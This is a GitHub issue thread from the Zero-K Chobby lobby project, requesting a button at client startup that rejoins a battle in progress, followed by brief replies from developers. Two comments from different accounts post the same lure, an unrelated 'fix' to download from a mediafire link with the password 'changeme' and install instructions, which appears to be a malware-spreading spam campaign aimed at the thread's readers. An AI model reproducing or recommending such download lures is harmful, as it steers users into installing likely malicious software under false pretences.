### ISSUE TITLE
(pie in the sky) Rejoin button at client startup

### ISSUE THREAD

**Issue by sprunk** [ZeroK-RTS/Chobby#898]
Say you need to restart the game, or you crash and the lobby goes down as well. After you return, you need to find the room of your ongoing battle again. Unless it was the lobpot, the room may be hard to find or it may even have gotten locked or something. Consider somehow detecting at startup (via server welcome network packet?) that you are a part of an ongoing battle and offer a rejoin button (one click to both enter the room and immediately rejoin the match) without having to remember/find/join the appropriate room manually.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by GoogleFrog** [comment]
Doesn't this happen already?

**Comment by Licho1** [comment]
I believe it does..

**Comment by sprunk** [comment]
Seems not to happen for spectators (what if you're a caster and a tourney room gets locked?) but maybe that's fine and not a big deal either way.
